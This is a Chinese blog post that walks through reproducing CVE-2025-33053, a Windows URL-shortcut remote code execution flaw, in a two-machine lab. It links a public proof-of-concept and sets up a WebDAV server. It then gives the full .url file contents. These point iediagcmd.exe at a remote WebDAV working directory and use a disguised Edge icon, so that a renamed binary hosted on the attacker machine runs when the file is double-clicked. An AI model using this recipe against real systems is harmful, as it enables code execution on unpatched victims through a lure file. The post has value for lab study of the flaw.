罕见在野0Day漏洞复现:CVE-2025-33053快捷方式远程代码执行

发布时间:2025-06-26 07:38  浏览量:1

CVE-2025-33053是个已被在野利用的零日漏洞,Microsoft在2025年6月补丁星期二中修复了。攻击者可以通过诱骗用户点击特制的URL文件来触发远程代码执行。

虽然说是个远程代码执行,由于WebDav服务器的特性,这个漏洞我估计只能用于内网。以下是复现过程。

一、KALI下WEBDAV的配置

Poc下载地址:https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept.git

我是在kali(192.168.1.4)下执行的。直接用Poc里的setup_webdav.sh快速建立了一个webDav服务器。

把WIN10下的iediagcmd.exe、calc.exe(可以用EveryThing找到)放在Kali下的/var/www/webdav目录。calc.exe改名为route.exe。我本文复现是用了win7下的calc.exe改名为route.exe,因为觉得它比较小巧。

在Win10(192.168.1.5)测试机上用浏览器打开http://192.168.1.4/webdav/,效果下图。

二、WIN10下URL快捷方式的建立和执行

win10下新建一个1.txt文件,内容如下:

[InternetShortcut]URL=C:\Program Files\Internet Explorer\iediagcmd.exeWorkingDirectory=\\192.168.1.4\webdav\ShowCommand=7IconIndex=13IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeModified=20F06BA06D07BD014D

将1.txt重名为2.url,双击2.url就可以弹出计算器了,需要等半分钟左右的时间。